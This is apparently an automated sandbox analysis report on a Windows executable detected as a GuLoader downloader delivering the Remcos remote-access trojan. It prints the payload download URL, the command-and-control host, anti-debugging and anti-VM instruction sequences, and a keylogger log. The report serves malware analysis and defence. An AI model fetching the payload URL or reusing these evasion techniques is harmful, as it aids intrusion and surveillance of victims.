Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: threadDelayed 9146
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: foregroundWindowGot 461

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep count: 9146 > 30
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep time: -45730s >= -30000s

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Thread sleep count: Count: 9146 delay: -5

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F6562 LdrInitializeThunk,

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F735B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.13.dr	Binary or memory string: [ Program Manager ]
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_00401A45 cpuid

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery621	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery312	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LzbZ4T1iV8.exe	18%	Virustotal		Browse
LzbZ4T1iV8.exe	18%	ReversingLabs	Win32.Trojan.Vebzenpak
LzbZ4T1iV8.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	1%	Virustotal		Browse
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUuqVZw139.bin^	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUuqVZw139.bin^	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0	LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458125
Start date:	02.08.2021
Start time:	21:16:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 17s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	LzbZ4T1iV8.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 37% (good quality ratio 15.7%) Quality average: 21.8% Quality standard deviation: 28.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.190.160.4, 20.190.160.132, 20.190.160.6, 20.190.160.69, 20.190.160.2, 20.190.160.73, 20.190.160.75, 20.190.160.67, 93.184.220.29, 51.104.136.2, 51.11.168.232 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	kGSHiWbgq9.exe	Get hash	malicious	Browse
194.5.97.128	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
101.99.94.119	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
wealthyrem.ddns.net	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119
	Audio #Ud83d#Udcde lifewire.org.HTML	Get hash	malicious	Browse	111.90.141.176
	bitratencrypt.exe	Get hash	malicious	Browse	111.90.149.108
	svchost.exe	Get hash	malicious	Browse	111.90.149.108
	eVF243bmXC.exe	Get hash	malicious	Browse	111.90.149.108
	xSnF0lxFUX.exe	Get hash	malicious	Browse	111.90.146.149
	QppmM7JmZd.exe	Get hash	malicious	Browse	111.90.146.149
	vNiyRd4GcH.exe	Get hash	malicious	Browse	111.90.146.149
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	111.90.146.149
	SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe	Get hash	malicious	Browse	101.99.94.204
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	111.90.147.240
	naxpJ9fFZ4.exe	Get hash	malicious	Browse	111.90.149.115
	dMH1IIv1a1.exe	Get hash	malicious	Browse	111.90.149.115
	bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML	Get hash	malicious	Browse	111.90.140.91
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	341288734918_06172021.xlsm	Get hash	malicious	Browse	101.99.95.230
	341288734918_06172021.xlsm	Get hash	malicious	Browse	101.99.95.230
	kctD8brhzU.exe	Get hash	malicious	Browse	111.90.146.149
DANILENKODE	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158
	Document.1-xml.eml.exe	Get hash	malicious	Browse	194.5.98.136
	2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exe	Get hash	malicious	Browse	194.5.98.212
	ynFBVCYIcu.exe	Get hash	malicious	Browse	194.5.98.195

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3453987070874214
Encrypted:	false
SSDEEP:	3:rklKlmvNcWKlRNU5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIazlbU5YcIeeDAlybW/G
MD5:	526F50323013D504471A1ACE38B89693
SHA1:	1D2CB4B5DADA7C1036CDBB57F350F2F318E5DBDF
SHA-256:	ACD440D4CB49505D3F6479A3BA54F12C5D5071D28F38A5038A98EBEFC7F1C987
SHA-512:	6F97E249C67F013EEF04E73C5A46E99EAD1FF8231E8FB2337E7CEFFD386BE4AE21DFEBC13C7CDF2680A884E431E08DF43621B1F51D9ACAD7A9CBCAA3946877E0
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.2. .2.1.:.1.8.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.659892921422715
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LzbZ4T1iV8.exe
File size:	114688
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
SHA512:	75135a1977450f914d77247938987ee40b45443ebb187ff7b7a2b1c83f9b1f32744b0ccdefecc7df20ec4be01543bac216fc56de8fbf18448625140c1b4264fe
SSDEEP:	1536:rI3BiEocy06WRx+Hfzae+8S6JxdQC+gz6DN1QmiPYlmcy06W++eI3B:rEvBD2C6byC+g6NzlVB++
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....TU.................@..........D........P....@................

File Icon


Icon Hash:	352d25253517a525

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x555407E7 [Thu May 14 02:26:47 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B40h
call 00007F7AFCA82725h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
or dword ptr [edi+512C9312h], ebx
inc edx
test eax, FF47123Eh
add dl, byte ptr [ebx-07h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
push ebp
inc edx
dec ecx
dec esi
inc esi
inc ebp
push ebp
inc esp
inc ecx
push esp
inc ebp
add byte ptr [eax], ch
or eax, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
pop edi
push ecx
xchg eax, edx
add ebp, esp
inc ebp
fiadd dword ptr [ecx-78h]
jp 00007F7AFCA826D5h
arpl word ptr [esi-5Dh], bx
daa
push 0000005Fh
adc al, 07h
pop ds
enter 7288h, 4Dh
stosb
ret
jp 00007F7AFCA82776h
fdivr qword ptr [edi+4F3AAE67h]
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push edx
pop ecx
add byte ptr [eax], al
sub byte ptr [eax+00h], bl
add byte ptr [eax], al
or eax, dword ptr [eax]
push eax
inc ecx
dec esp
dec esp
inc edx
inc ebp
inc ecx
push edx
inc ebp
push edx
push ebx
add byte ptr [43000701h], cl
inc ebp
dec ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b9e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13df4	0x14000	False	0.652099609375	data	7.08169017725	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b9e	0x6000	False	0.545817057292	data	6.02928789817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcf6	0xea8	data
RT_ICON	0x1b44e	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3457162792, next used block 3459124259
RT_ICON	0x1aee6	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1893e	0x25a8	data
RT_ICON	0x17896	0x10a8	data
RT_ICON	0x1742e	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173d4	0x5a	data
RT_VERSION	0x171e0	0x1f4	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	GYMNOSPERMAE
FileVersion	1.00
OriginalFilename	GYMNOSPERMAE.exe
ProductName	COMANAGE

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 21:20:11.784956932 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.833715916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.833933115 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.882823944 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.882945061 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.932694912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932858944 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932898045 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932940960 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.932944059 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932969093 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.933052063 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982657909 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982708931 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982744932 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982781887 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982825994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982825041 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982887030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982904911 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982945919 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982996941 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.983000994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.983074903 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.983122110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.031961918 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032012939 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032052040 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032087088 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032133102 CEST	80	49766	101.99.94.119	192.168.2.4
